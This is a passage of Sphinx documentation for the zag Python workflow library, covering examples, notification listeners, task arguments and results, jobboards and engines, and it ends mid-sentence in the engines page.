Output
------
.. image:: img/mandelbrot.png
:height: 128px
:align: right
:alt: Generated mandelbrot fractal
Code
----
.. literalinclude:: ../../../zag/examples/wbe_mandelbrot.py
:language: python
:linenos:
:lines: 16-
Jobboard producer/consumer (simple)
===================================
.. note::
Full source located at :example:`jobboard_produce_consume_colors`
.. literalinclude:: ../../../zag/examples/jobboard_produce_consume_colors.py
:language: python
:linenos:
:lines: 16-
Conductor simulating a CI pipeline
==================================
.. note::
Full source located at :example:`tox_conductor`
.. literalinclude:: ../../../zag/examples/tox_conductor.py
:language: python
:linenos:
:lines: 16-
Conductor running 99 bottles of beer song requests
==================================================
.. note::
Full source located at :example:`99_bottles`
.. literalinclude:: ../../../zag/examples/99_bottles.py
:language: python
:linenos:
:lines: 16-
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/examples.rst | examples.rst |
---------------------------
Notifications and listeners
---------------------------
.. testsetup::
from zag import task
from zag.patterns import linear_flow
from zag import engines
from zag.types import notifier
ANY = notifier.Notifier.ANY
Overview
========
Engines provide a way to receive notification on task and flow state
transitions (see :doc:`states <states>`), which is useful for
monitoring, logging, metrics, debugging and plenty of other tasks.
To receive these notifications you should register a callback with
an instance of the :py:class:`~zag.types.notifier.Notifier`
class that is attached to :py:class:`~zag.engines.base.Engine`
attributes ``atom_notifier`` and ``notifier``.
Zag also comes with a set of predefined :ref:`listeners <listeners>`, and
provides means to write your own listeners, which can be more convenient than
using raw callbacks.
Receiving notifications with callbacks
======================================
Flow notifications
------------------
To receive notification on flow state changes use the
:py:class:`~zag.types.notifier.Notifier` instance available as the
``notifier`` property of an engine.
A basic example is:
.. doctest::
>>> class CatTalk(task.Task):
... def execute(self, meow):
... print(meow)
... return "cat"
...
>>> class DogTalk(task.Task):
... def execute(self, woof):
... print(woof)
... return 'dog'
...
>>> def flow_transition(state, details):
... print("Flow '%s' transition to state %s" % (details['flow_name'], state))
...
>>>
>>> flo = linear_flow.Flow("cat-dog").add(
... CatTalk(), DogTalk(provides="dog"))
>>> eng = engines.load(flo, store={'meow': 'meow', 'woof': 'woof'})
>>> eng.notifier.register(ANY, flow_transition)
>>> eng.run()
Flow 'cat-dog' transition to state RUNNING
meow
woof
Flow 'cat-dog' transition to state SUCCESS
Task notifications
------------------
To receive notification on task state changes use the
:py:class:`~zag.types.notifier.Notifier` instance available as the
``atom_notifier`` property of an engine.
A basic example is:
.. doctest::
>>> class CatTalk(task.Task):
... def execute(self, meow):
... print(meow)
... return "cat"
...
>>> class DogTalk(task.Task):
... def execute(self, woof):
... print(woof)
... return 'dog'
...
>>> def task_transition(state, details):
... print("Task '%s' transition to state %s" % (details['task_name'], state))
...
>>>
>>> flo = linear_flow.Flow("cat-dog")
>>> flo.add(CatTalk(), DogTalk(provides="dog"))
<zag.patterns.linear_flow.Flow object at 0x...>
>>> eng = engines.load(flo, store={'meow': 'meow', 'woof': 'woof'})
>>> eng.atom_notifier.register(ANY, task_transition)
>>> eng.run()
Task 'CatTalk' transition to state RUNNING
meow
Task 'CatTalk' transition to state SUCCESS
Task 'DogTalk' transition to state RUNNING
woof
Task 'DogTalk' transition to state SUCCESS
.. _listeners:
Listeners
=========
Zag comes with a set of predefined listeners -- helper classes that can be
used to do various actions on flow and/or tasks transitions. You can also
create your own listeners easily, which may be more convenient than using raw
callbacks for some use cases.
For example, this is how you can use
:py:class:`~zag.listeners.printing.PrintingListener`:
.. doctest::
>>> from zag.listeners import printing
>>> class CatTalk(task.Task):
... def execute(self, meow):
... print(meow)
... return "cat"
...
>>> class DogTalk(task.Task):
... def execute(self, woof):
... print(woof)
... return 'dog'
...
>>>
>>> flo = linear_flow.Flow("cat-dog").add(
... CatTalk(), DogTalk(provides="dog"))
>>> eng = engines.load(flo, store={'meow': 'meow', 'woof': 'woof'})
>>> with printing.PrintingListener(eng):
... eng.run()
...
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved flow 'cat-dog' (...) into state 'RUNNING' from state 'PENDING'
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved task 'CatTalk' (...) into state 'RUNNING' from state 'PENDING'
meow
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved task 'CatTalk' (...) into state 'SUCCESS' from state 'RUNNING' with result 'cat' (failure=False)
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved task 'DogTalk' (...) into state 'RUNNING' from state 'PENDING'
woof
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved task 'DogTalk' (...) into state 'SUCCESS' from state 'RUNNING' with result 'dog' (failure=False)
<zag.engines.action_engine.engine.SerialActionEngine object at ...> has moved flow 'cat-dog' (...) into state 'SUCCESS' from state 'RUNNING'
Interfaces
==========
.. automodule:: zag.listeners.base
Implementations
===============
Printing and logging listeners
------------------------------
.. autoclass:: zag.listeners.logging.LoggingListener
.. autoclass:: zag.listeners.logging.DynamicLoggingListener
.. autoclass:: zag.listeners.printing.PrintingListener
Timing listeners
----------------
.. autoclass:: zag.listeners.timing.DurationListener
.. autoclass:: zag.listeners.timing.PrintingDurationListener
.. autoclass:: zag.listeners.timing.EventTimeListener
Claim listener
--------------
.. autoclass:: zag.listeners.claims.CheckingClaimListener
Capturing listener
------------------
.. autoclass:: zag.listeners.capturing.CaptureListener
Formatters
----------
.. automodule:: zag.formatters
Hierarchy
=========
.. inheritance-diagram::
zag.listeners.base.DumpingListener
zag.listeners.base.Listener
zag.listeners.capturing.CaptureListener
zag.listeners.claims.CheckingClaimListener
zag.listeners.logging.DynamicLoggingListener
zag.listeners.logging.LoggingListener
zag.listeners.printing.PrintingListener
zag.listeners.timing.PrintingDurationListener
zag.listeners.timing.EventTimeListener
zag.listeners.timing.DurationListener
:parts: 1
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/notifications.rst | notifications.rst |
=====================
Arguments and results
=====================
.. |task.execute| replace:: :py:meth:`~zag.atom.Atom.execute`
.. |task.revert| replace:: :py:meth:`~zag.atom.Atom.revert`
.. |retry.execute| replace:: :py:meth:`~zag.retry.Retry.execute`
.. |retry.revert| replace:: :py:meth:`~zag.retry.Retry.revert`
.. |Retry| replace:: :py:class:`~zag.retry.Retry`
.. |Task| replace:: :py:class:`Task <zag.task.Task>`
In Zag, all flow and task state goes to (potentially persistent) storage
(see :doc:`persistence <persistence>` for more details). That includes all the
information that :doc:`atoms <atoms>` (e.g. tasks, retry objects...) in the
workflow need when they are executed, and all the information task/retry
produces (via serializable results). A developer who implements tasks/retries
or flows can specify what arguments a task/retry accepts and what result it
returns in several ways. This document will help you understand what those ways
are and how to use those ways to accomplish your desired usage pattern.
.. glossary::
Task/retry arguments
Set of names of task/retry arguments available as the ``requires``
and/or ``optional`` property of the task/retry instance. When a task or
retry object is about to be executed values with these names are
retrieved from storage and passed to the ``execute`` method of the
task/retry. If any names in the ``requires`` property cannot be
found in storage, an exception will be thrown. Any names in the
``optional`` property that cannot be found are ignored.
Task/retry results
Set of names of task/retry results (what task/retry provides) available
as ``provides`` property of task or retry instance. After a task/retry
finishes successfully, its result(s) (what the ``execute`` method
returns) are available by these names from storage (see examples
below).
.. testsetup::
from zag import task
Arguments specification
=======================
There are different ways to specify the task argument ``requires`` set.
Arguments inference
-------------------
Task/retry arguments can be inferred from arguments of the |task.execute|
method of a task (or the |retry.execute| of a retry object).
.. doctest::
>>> class MyTask(task.Task):
... def execute(self, spam, eggs, bacon=None):
... return spam + eggs
...
>>> sorted(MyTask().requires)
['eggs', 'spam']
>>> sorted(MyTask().optional)
['bacon']
Inference from the method signature is the ''simplest'' way to specify
arguments. Special arguments like ``self``, ``*args`` and ``**kwargs`` are
ignored during inference (as these names have special meaning/usage in python).
.. doctest::
>>> class UniTask(task.Task):
... def execute(self, *args, **kwargs):
... pass
...
>>> sorted(UniTask().requires)
[]
.. make vim sphinx highlighter* happy**
Rebinding
---------
**Why:** There are cases when the value you want to pass to a task/retry is
stored with a name other than the corresponding arguments name. That's when the
``rebind`` constructor parameter comes in handy. Using it the flow author
can instruct the engine to fetch a value from storage by one name, but pass it
to a tasks/retries ``execute`` method with another name. There are two possible
ways of accomplishing this.
The first is to pass a dictionary that maps the argument name to the name
of a saved value.
For example, if you have task::
class SpawnVMTask(task.Task):
def execute(self, vm_name, vm_image_id, **kwargs):
pass # TODO(imelnikov): use parameters to spawn vm
and you saved ``'vm_name'`` with ``'name'`` key in storage, you can spawn a vm
with such ``'name'`` like this::
SpawnVMTask(rebind={'vm_name': 'name'})
The second way is to pass a tuple/list/dict of argument names. The length of
the tuple/list/dict should not be less then number of required parameters.
For example, you can achieve the same effect as the previous example with::
SpawnVMTask(rebind_args=('name', 'vm_image_id'))
This is equivalent to a more elaborate::
SpawnVMTask(rebind=dict(vm_name='name',
vm_image_id='vm_image_id'))
In both cases, if your task (or retry) accepts arbitrary arguments
with the ``**kwargs`` construct, you can specify extra arguments.
::
SpawnVMTask(rebind=('name', 'vm_image_id', 'admin_key_name'))
When such task is about to be executed, ``name``, ``vm_image_id`` and
``admin_key_name`` values are fetched from storage and value from ``name`` is
passed to |task.execute| method as ``vm_name``, value from ``vm_image_id`` is
passed as ``vm_image_id``, and value from ``admin_key_name`` is passed as
``admin_key_name`` parameter in ``kwargs``.
Manually specifying requirements
--------------------------------
**Why:** It is often useful to manually specify the requirements of a task,
either by a task author or by the flow author (allowing the flow author to
override the task requirements).
To accomplish this when creating your task use the constructor to specify
manual requirements. Those manual requirements (if they are not functional
arguments) will appear in the ``kwargs`` of the |task.execute| method.
.. doctest::
>>> class Cat(task.Task):
... def __init__(self, **kwargs):
... if 'requires' not in kwargs:
... kwargs['requires'] = ("food", "milk")
... super(Cat, self).__init__(**kwargs)
... def execute(self, food, **kwargs):
... pass
...
>>> cat = Cat()
>>> sorted(cat.requires)
['food', 'milk']
.. make vim sphinx highlighter happy**
When constructing a task instance the flow author can also add more
requirements if desired. Those manual requirements (if they are not functional
arguments) will appear in the ``kwargs`` parameter of the |task.execute|
method.
.. doctest::
>>> class Dog(task.Task):
... def execute(self, food, **kwargs):
... pass
>>> dog = Dog(requires=("water", "grass"))
>>> sorted(dog.requires)
['food', 'grass', 'water']
.. make vim sphinx highlighter happy**
If the flow author desires she can turn the argument inference off and override
requirements manually. Use this at your own **risk** as you must be careful to
avoid invalid argument mappings.
.. doctest::
>>> class Bird(task.Task):
... def execute(self, food, **kwargs):
... pass
>>> bird = Bird(requires=("food", "water", "grass"), auto_extract=False)
>>> sorted(bird.requires)
['food', 'grass', 'water']
.. make vim sphinx highlighter happy**
Results specification
=====================
In python, function results are not named, so we can not infer what a
task/retry returns. This is important since the complete result (what the
task |task.execute| or retry |retry.execute| method returns) is saved
in (potentially persistent) storage, and it is typically (but not always)
desirable to make those results accessible to others. To accomplish this
the task/retry specifies names of those values via its ``provides`` constructor
parameter or by its default provides attribute.
Examples
--------
Returning one value
+++++++++++++++++++
If task returns just one value, ``provides`` should be string -- the
name of the value.
.. doctest::
>>> class TheAnswerReturningTask(task.Task):
... def execute(self):
... return 42
...
>>> sorted(TheAnswerReturningTask(provides='the_answer').provides)
['the_answer']
Returning a tuple
+++++++++++++++++
For a task that returns several values, one option (as usual in python) is to
return those values via a ``tuple``.
::
class BitsAndPiecesTask(task.Task):
def execute(self):
return 'BITs', 'PIECEs'
Then, you can give the value individual names, by passing a tuple or list as
``provides`` parameter:
::
BitsAndPiecesTask(provides=('bits', 'pieces'))
After such task is executed, you (and the engine, which is useful for other
tasks) will be able to get those elements from storage by name:
::
>>> storage.fetch('bits')
'BITs'
>>> storage.fetch('pieces')
'PIECEs'
Provides argument can be shorter then the actual tuple returned by a task --
then extra values are ignored (but, as expected, **all** those values are saved
and passed to the task |task.revert| or retry |retry.revert| method).
.. note::
Provides arguments tuple can also be longer then the actual tuple returned
by task -- when this happens the extra parameters are left undefined: a
warning is printed to logs and if use of such parameter is attempted a
:py:class:`~zag.exceptions.NotFound` exception is raised.
Returning a dictionary
++++++++++++++++++++++
Another option is to return several values as a dictionary (aka a ``dict``).
::
class BitsAndPiecesTask(task.Task):
def execute(self):
return {
'bits': 'BITs',
'pieces': 'PIECEs'
}
Zag expects that a dict will be returned if ``provides`` argument is a
``set``:
::
BitsAndPiecesTask(provides=set(['bits', 'pieces']))
After such task executes, you (and the engine, which is useful for other tasks)
will be able to get elements from storage by name:
::
>>> storage.fetch('bits')
'BITs'
>>> storage.fetch('pieces')
'PIECEs'
.. note::
If some items from the dict returned by the task are not present in the
provides arguments -- then extra values are ignored (but, of course, saved
and passed to the |task.revert| method). If the provides argument has some
items not present in the actual dict returned by the task -- then extra
parameters are left undefined: a warning is printed to logs and if use of
such parameter is attempted a :py:class:`~zag.exceptions.NotFound`
exception is raised.
Default provides
++++++++++++++++
As mentioned above, the default base class provides nothing, which means
results are not accessible to other tasks/retries in the flow.
The author can override this and specify default value for provides using
the ``default_provides`` class/instance variable:
::
class BitsAndPiecesTask(task.Task):
default_provides = ('bits', 'pieces')
def execute(self):
return 'BITs', 'PIECEs'
Of course, the flow author can override this to change names if needed:
::
BitsAndPiecesTask(provides=('b', 'p'))
or to change structure -- e.g. this instance will make tuple accessible
to other tasks by name ``'bnp'``:
::
BitsAndPiecesTask(provides='bnp')
or the flow author may want to return default behavior and hide the results of
the task from other tasks in the flow (e.g. to avoid naming conflicts):
::
BitsAndPiecesTask(provides=())
Revert arguments
================
To revert a task the :doc:`engine <engines>` calls the tasks
|task.revert| method. This method should accept the same arguments
as the |task.execute| method of the task and one more special keyword
argument, named ``result``.
For ``result`` value, two cases are possible:
* If the task is being reverted because it failed (an exception was raised
from its |task.execute| method), the ``result`` value is an instance of a
:py:class:`~zag.types.failure.Failure` object that holds the exception
information.
* If the task is being reverted because some other task failed, and this task
finished successfully, ``result`` value is the result fetched from storage:
ie, what the |task.execute| method returned.
All other arguments are fetched from storage in the same way it is done for
|task.execute| method.
To determine if a task failed you can check whether ``result`` is instance of
:py:class:`~zag.types.failure.Failure`::
from zag.types import failure
class RevertingTask(task.Task):
def execute(self, spam, eggs):
return do_something(spam, eggs)
def revert(self, result, spam, eggs):
if isinstance(result, failure.Failure):
print("This task failed, exception: %s"
% result.exception_str)
else:
print("do_something returned %r" % result)
If this task failed (ie ``do_something`` raised an exception) it will print
``"This task failed, exception:"`` and a exception message on revert. If this
task finished successfully, it will print ``"do_something returned"`` and a
representation of the ``do_something`` result.
Retry arguments
===============
A |Retry| controller works with arguments in the same way as a |Task|. But it
has an additional parameter ``'history'`` that is itself a
:py:class:`~zag.retry.History` object that contains what failed over all
the engines attempts (aka the outcomes). The history object can be
viewed as a tuple that contains a result of the previous retries run and a
table/dict where each key is a failed atoms name and each value is
a :py:class:`~zag.types.failure.Failure` object.
Consider the following implementation::
class MyRetry(retry.Retry):
default_provides = 'value'
def on_failure(self, history, *args, **kwargs):
print(list(history))
return RETRY
def execute(self, history, *args, **kwargs):
print(list(history))
return 5
def revert(self, history, *args, **kwargs):
print(list(history))
Imagine the above retry had returned a value ``'5'`` and then some task ``'A'``
failed with some exception. In this case ``on_failure`` method will receive
the following history (printed as a list)::
[('5', {'A': failure.Failure()})]
At this point (since the implementation returned ``RETRY``) the
|retry.execute| method will be called again and it will receive the same
history and it can then return a value that subsequent tasks can use to alter
their behavior.
If instead the |retry.execute| method itself raises an exception,
the |retry.revert| method of the implementation will be called and
a :py:class:`~zag.types.failure.Failure` object will be present in the
history object instead of the typical result.
.. note::
After a |Retry| has been reverted, the objects history will be cleaned.
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/arguments_and_results.rst | arguments_and_results.rst |
----
Jobs
----
Overview
========
Jobs and jobboards are a **novel** concept that Zag provides to allow for
automatic ownership transfer of workflows between capable owners (those owners
usually then use :doc:`engines <engines>` to complete the workflow). They
provide the necessary semantics to be able to atomically transfer a job from a
producer to a consumer in a reliable and fault tolerant manner. They are
modeled off the concept used to post and acquire work in the physical world
(typically a job listing in a newspaper or online website serves a similar
role).
**TLDR:** It's similar to a queue, but consumers lock items on the queue when
claiming them, and only remove them from the queue when they're done with the
work. If the consumer fails, the lock is *automatically* released and the item
is back on the queue for further consumption.
.. note::
For more information, please visit the `paradigm shift`_ page for
more details.
Definitions
===========
Jobs
A :py:class:`job <zag.jobs.base.Job>` consists of a unique identifier,
name, and a reference to a :py:class:`logbook
<zag.persistence.models.LogBook>` which contains the details of the
work that has been or should be/will be completed to finish the work that has
been created for that job.
Jobboards
A :py:class:`jobboard <zag.jobs.base.JobBoard>` is responsible for
managing the posting, ownership, and delivery of jobs. It acts as the
location where jobs can be posted, claimed and searched for; typically by
iteration or notification. Jobboards may be backed by different *capable*
implementations (each with potentially differing configuration) but all
jobboards implement the same interface and semantics so that the backend
usage is as transparent as possible. This allows deployers or developers of a
service that uses Zag to select a jobboard implementation that fits
their setup (and their intended usage) best.
High level architecture
=======================
.. figure:: img/jobboard.png
:height: 350px
:align: right
**Note:** This diagram shows the high-level diagram (and further
parts of this documentation also refer to it as well) of the zookeeper
implementation (other implementations will typically have
different architectures).
Features
========
- High availability
- Guarantees workflow forward progress by transferring partially complete
work or work that has not been started to entities which can either resume
the previously partially completed work or begin initial work to ensure
that the workflow as a whole progresses (where progressing implies
transitioning through the workflow :doc:`patterns <patterns>` and
:doc:`atoms <atoms>` and completing their associated
:doc:`states <states>` transitions).
- Atomic transfer and single ownership
- Ensures that only one workflow is managed (aka owned) by a single owner at
a time in an atomic manner (including when the workflow is transferred to
a owner that is resuming some other failed owners work). This avoids
contention and ensures a workflow is managed by one and only one entity at
a time.
- *Note:* this does not mean that the owner needs to run the
workflow itself but instead said owner could use an engine that runs the
work in a distributed manner to ensure that the workflow progresses.
- Separation of workflow construction and execution
- Jobs can be created with logbooks that contain a specification of the work
to be done by a entity (such as an API server). The job then can be
completed by a entity that is watching that jobboard (not necessarily the
API server itself). This creates a disconnection between work
formation and work completion that is useful for scaling out horizontally.
- Asynchronous completion
- When for example a API server posts a job for completion to a
jobboard that API server can return a *tracking* identifier to the user
calling the API service. This *tracking* identifier can be used by the
user to poll for status (similar in concept to a shipping *tracking*
identifier created by fedex or UPS).
Usage
=====
All jobboards are mere classes that implement same interface, and of course
it is possible to import them and create instances of them just like with any
other class in Python. But the easier (and recommended) way for creating
jobboards is by using the :py:meth:`fetch() <zag.jobs.backends.fetch>`
function which uses entrypoints (internally using `stevedore`_) to fetch and
configure your backend.
Using this function the typical creation of a jobboard (and an example posting
of a job) might look like:
.. code-block:: python
from zag.persistence import backends as persistence_backends
from zag.jobs import backends as job_backends
...
persistence = persistence_backends.fetch({
"connection': "mysql",
"user": ...,
"password": ...,
})
book = make_and_save_logbook(persistence)
board = job_backends.fetch('my-board', {
"board": "zookeeper",
}, persistence=persistence)
job = board.post("my-first-job", book)
...
Consumption of jobs is similarly achieved by creating a jobboard and using
the iteration functionality to find and claim jobs (and eventually consume
them). The typical usage of a jobboard for consumption (and work completion)
might look like:
.. code-block:: python
import time
from zag import exceptions as exc
from zag.persistence import backends as persistence_backends
from zag.jobs import backends as job_backends
...
my_name = 'worker-1'
coffee_break_time = 60
persistence = persistence_backends.fetch({
"connection': "mysql",
"user": ...,
"password": ...,
})
board = job_backends.fetch('my-board', {
"board": "zookeeper",
}, persistence=persistence)
while True:
my_job = None
for job in board.iterjobs(only_unclaimed=True):
try:
board.claim(job, my_name)
except exc.UnclaimableJob:
pass
else:
my_job = job
break
if my_job is not None:
try:
perform_job(my_job)
except Exception:
LOG.exception("I failed performing job: %s", my_job)
board.abandon(my_job, my_name)
else:
# I finished it, now cleanup.
board.consume(my_job)
persistence.get_connection().destroy_logbook(my_job.book.uuid)
time.sleep(coffee_break_time)
...
There are a few ways to provide arguments to the flow. The first option is to
add a ``store`` to the flowdetail object in the
:py:class:`logbook <zag.persistence.models.LogBook>`.
You can also provide a ``store`` in the
:py:class:`job <zag.jobs.base.Job>` itself when posting it to the
job board. If both ``store`` values are found, they will be combined,
with the :py:class:`job <zag.jobs.base.Job>` ``store``
overriding the :py:class:`logbook <zag.persistence.models.LogBook>`
``store``.
.. code-block:: python
from oslo_utils import uuidutils
from zag import engines
from zag.persistence import backends as persistence_backends
from zag.persistence import models
from zag.jobs import backends as job_backends
...
persistence = persistence_backends.fetch({
"connection': "mysql",
"user": ...,
"password": ...,
})
board = job_backends.fetch('my-board', {
"board": "zookeeper",
}, persistence=persistence)
book = models.LogBook('my-book', uuidutils.generate_uuid())
flow_detail = models.FlowDetail('my-job', uuidutils.generate_uuid())
book.add(flow_detail)
connection = persistence.get_connection()
connection.save_logbook(book)
flow_detail.meta['store'] = {'a': 1, 'c': 3}
job_details = {
"flow_uuid": flow_detail.uuid,
"store": {'a': 2, 'b': 1}
}
engines.save_factory_details(flow_detail, flow_factory,
factory_args=[],
factory_kwargs={},
backend=persistence)
jobboard = get_jobboard(zk_client)
jobboard.connect()
job = jobboard.post('my-job', book=book, details=job_details)
# the flow global parameters are now the combined store values
# {'a': 2, 'b': 1', 'c': 3}
...
Types
=====
Zookeeper
---------
**Board type**: ``'zookeeper'``
Uses `zookeeper`_ to provide the jobboard capabilities and semantics by using
a zookeeper directory, ephemeral, non-ephemeral nodes and watches.
Additional *kwarg* parameters:
* ``client``: a class that provides ``kazoo.client.KazooClient``-like
interface; it will be used for zookeeper interactions, sharing clients
between jobboard instances will likely provide better scalability and can
help avoid creating to many open connections to a set of zookeeper servers.
* ``persistence``: a class that provides a :doc:`persistence <persistence>`
backend interface; it will be used for loading jobs logbooks for usage at
runtime or for usage before a job is claimed for introspection.
Additional *configuration* parameters:
* ``path``: the root zookeeper path to store job information (*defaults* to
``/zag/jobs``)
* ``hosts``: the list of zookeeper hosts to connect to (*defaults* to
``localhost:2181``); only used if a client is not provided.
* ``timeout``: the timeout used when performing operations with zookeeper;
only used if a client is not provided.
* ``handler``: a class that provides ``kazoo.handlers``-like interface; it will
be used internally by `kazoo`_ to perform asynchronous operations, useful
when your program uses eventlet and you want to instruct kazoo to use an
eventlet compatible handler.
.. note::
See :py:class:`~zag.jobs.backends.impl_zookeeper.ZookeeperJobBoard`
for implementation details.
Redis
-----
**Board type**: ``'redis'``
Uses `redis`_ to provide the jobboard capabilities and semantics by using
a redis hash data structure and individual job ownership keys (that can
optionally expire after a given amount of time).
.. note::
See :py:class:`~zag.jobs.backends.impl_redis.RedisJobBoard`
for implementation details.
Considerations
==============
Some usage considerations should be used when using a jobboard to make sure
it's used in a safe and reliable manner. Eventually we hope to make these
non-issues but for now they are worth mentioning.
Dual-engine jobs
----------------
**What:** Since atoms and engines are not currently `preemptable`_ we can not
force an engine (or the threads/remote workers... it is using to run) to stop
working on an atom (it is general bad behavior to force code to stop without
its consent anyway) if it has already started working on an atom (short of
doing a ``kill -9`` on the running interpreter). This could cause problems
since the points an engine can notice that it no longer owns a claim is at any
:doc:`state <states>` change that occurs (transitioning to a new atom or
recording a result for example), where upon noticing the claim has been lost
the engine can immediately stop doing further work. The effect that this causes
is that when a claim is lost another engine can immediately attempt to acquire
the claim that was previously lost and it *could* begin working on the
unfinished tasks that the later engine may also still be executing (since that
engine is not yet aware that it has *lost* the claim).
**TLDR:** not `preemptable`_, possible to become aware of losing a claim
after the fact (at the next state change), another engine could have acquired
the claim by then, therefore both would be *working* on a job.
**Alleviate by:**
#. Ensure your atoms are `idempotent`_, this will cause an engine that may be
executing the same atom to be able to continue executing without causing
any conflicts/problems (idempotency guarantees this).
#. On claiming jobs that have been claimed previously enforce a policy that
happens before the jobs workflow begins to execute (possibly prior to an
engine beginning the jobs work) that ensures that any prior work has been
rolled back before continuing rolling forward. For example:
* Rolling back the last atom/set of atoms that finished.
* Rolling back the last state change that occurred.
#. Delay claiming partially completed work by adding a wait period (to allow
the previous engine to coalesce) before working on a partially completed job
(combine this with the prior suggestions and *most* dual-engine issues
should be avoided).
.. _idempotent: https://en.wikipedia.org/wiki/Idempotence
.. _preemptable: https://en.wikipedia.org/wiki/Preemption_%28computing%29
Interfaces
==========
.. automodule:: zag.jobs.base
.. automodule:: zag.jobs.backends
Implementations
===============
Zookeeper
---------
.. automodule:: zag.jobs.backends.impl_zookeeper
Redis
-----
.. automodule:: zag.jobs.backends.impl_redis
Hierarchy
=========
.. inheritance-diagram::
zag.jobs.base
zag.jobs.backends.impl_redis
zag.jobs.backends.impl_zookeeper
:parts: 1
.. _paradigm shift: https://wiki.openstack.org/wiki/Zag/Paradigm_shifts#Workflow_ownership_transfer
.. _zookeeper: http://zookeeper.apache.org/
.. _kazoo: https://kazoo.readthedocs.io/en/latest/
.. _stevedore: https://docs.openstack.org/stevedore/latest
.. _redis: https://redis.io/
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/jobs.rst | jobs.rst |
-------
Engines
-------
Overview
========
Engines are what **really** runs your atoms.
An *engine* takes a flow structure (described by :doc:`patterns <patterns>`)
and uses it to decide which :doc:`atom <atoms>` to run and when.
Zag provides different implementations of engines. Some may be easier to
use (ie, require no additional infrastructure setup) and understand; others
might require more complicated setup but provide better scalability. The idea
and *ideal* is that deployers or developers of a service that use Zag can
select an engine that suites their setup best without modifying the code of
said service.
.. note::
Engines usually have different capabilities and configuration, but all of
them **must** implement the same interface and preserve the semantics of
patterns (e.g. parts of a :py:class:`.linear_flow.Flow`
are run one after another, in order, even if the selected
engine is *capable* of running tasks in parallel).
Why they exist
--------------
An engine being *the* core component which actually makes your flows progress
is likely a new concept for many programmers so let's describe how it operates
in more depth and some of the reasoning behind why it exists. This will
hopefully make it more clear on their value add to the Zag library user.
First though let us discuss something most are familiar already with; the
difference between `declarative`_ and `imperative`_ programming models. The
imperative model involves establishing statements that accomplish a programs
action (likely using conditionals and such other language features to do this).
This kind of program embeds the *how* to accomplish a goal while also defining
*what* the goal actually is (and the state of this is maintained in memory or
on the stack while these statements execute). In contrast there is the
declarative model which instead of combining the *how* to accomplish a goal
along side the *what* is to be accomplished splits these two into only
declaring what the intended goal is and not the *how*. In Zag terminology
the *what* is the structure of your flows and the tasks and other atoms you
have inside those flows, but the *how* is not defined (the line becomes blurred
since tasks themselves contain imperative code, but for now consider a task as
more of a *pure* function that executes, reverts and may require inputs and
provide outputs). This is where engines get involved; they do the execution of
the *what* defined via :doc:`atoms <atoms>`, tasks, flows and the relationships
defined there-in and execute these in a well-defined manner (and the engine is
responsible for any state manipulation instead).
This mix of imperative and declarative (with a stronger emphasis on the
declarative model) allows for the following functionality to become possible:
* Enhancing reliability: Decoupling of state alterations from what should be
accomplished allows for a *natural* way of resuming by allowing the engine to
track the current state and know at which point a workflow is in and how to
get back into that state when resumption occurs.
* Enhancing scalability: When an engine is responsible for executing your
desired work it becomes possible to alter the *how* in the future by creating
new types of execution backends (for example the `worker`_ model which does
not execute locally). Without the decoupling of the *what* and the *how* it
is not possible to provide such a feature (since by the very nature of that
coupling this kind of functionality is inherently very hard to provide).
* Enhancing consistency: Since the engine is responsible for executing atoms
and the associated workflow, it can be one (if not the only) of the primary
entities that is working to keep the execution model in a consistent state.
Coupled with atoms which *should* be immutable and have have limited (if any)
internal state the ability to reason about and obtain consistency can be
vastly improved.
* With future features around locking (using `tooz`_ to help) engines can
also help ensure that resources being accessed by tasks are reliably
obtained and mutated on. This will help ensure that other processes,
threads, or other types of entities are also not executing tasks that
manipulate those same resources (further increasing consistency).
Of course these kind of features can come with some drawbacks:
* The downside of decoupling the *how* and the *what* is that the imperative
model where functions control & manipulate state must start to be shifted
away from (and this is likely a mindset change for programmers used to the
imperative model). We have worked to make this less of a concern by creating
and encouraging the usage of :doc:`persistence <persistence>`, to help make
it possible to have state and transfer that state via a argument input and
output mechanism.
* Depending on how much imperative code exists (and state inside that code)
there *may* be *significant* rework of that code and converting or
refactoring it to these new concepts. We have tried to help here by allowing
you to have tasks that internally use regular python code (and internally can
be written in an imperative style) as well as by providing
:doc:`examples <examples>` that show how to use these concepts.
* Another one of the downsides of decoupling the *what* from the *how* is that
it may become harder to use traditional techniques to debug failures
(especially if remote workers are involved). We try to help here by making it
easy to track, monitor and introspect the actions & state changes that are
occurring inside an engine (see :doc:`notifications <notifications>` for how
to use some of these capabilities).
.. _declarative: http://en.wikipedia.org/wiki/Declarative_programming
.. _imperative: http://en.wikipedia.org/wiki/Imperative_programming
.. _tooz: https://github.com/openstack/tooz
Creating
========
.. _creating engines:
All engines are mere classes that implement the same interface, and of course
it is possible to import them and create instances just like with any classes
in Python. But the easier (and recommended) way for creating an engine is using
the engine helper functions. All of these functions are imported into the
``zag.engines`` module namespace, so the typical usage of these functions
might look like::
from zag import engines
...
flow = make_flow()
eng = engines.load(flow, engine='serial', backend=my_persistence_conf)
eng.run()
...
.. automodule:: zag.engines.helpers
Usage
=====
To select which engine to use and pass parameters to an engine you should use
the ``engine`` parameter any engine helper function accepts and for any engine
specific options use the ``kwargs`` parameter.
Types
=====
Serial
------
**Engine type**: ``'serial'``
Runs all tasks on a single thread -- the same thread
:py:meth:`~zag.engines.base.Engine.run` is called from.
.. note::
This engine is used by **default**.
.. tip::
If eventlet is used then this engine will not block other threads
from running as eventlet automatically creates a implicit co-routine
system (using greenthreads and monkey patching). See
`eventlet <http://eventlet.net/>`_ and
`greenlet <http://greenlet.readthedocs.org/>`_ for more details.
Parallel
--------
**Engine type**: ``'parallel'``
A parallel engine schedules tasks onto different threads/processes to allow for
running non-dependent tasks simultaneously. See the documentation of
:py:class:`~zag.engines.action_engine.engine.ParallelActionEngine` for
supported arguments that can be used to construct a parallel engine that runs
using your desired execution model.
.. tip::
Sharing an executor between engine instances provides better
scalability by reducing thread/process creation and teardown as well as by
reusing existing pools (which is a good practice in general).
.. warning::
Running tasks with a `process pool executor`_ is **experimentally**
supported. This is mainly due to the `futures backport`_ and
the `multiprocessing`_ module that exist in older versions of python not
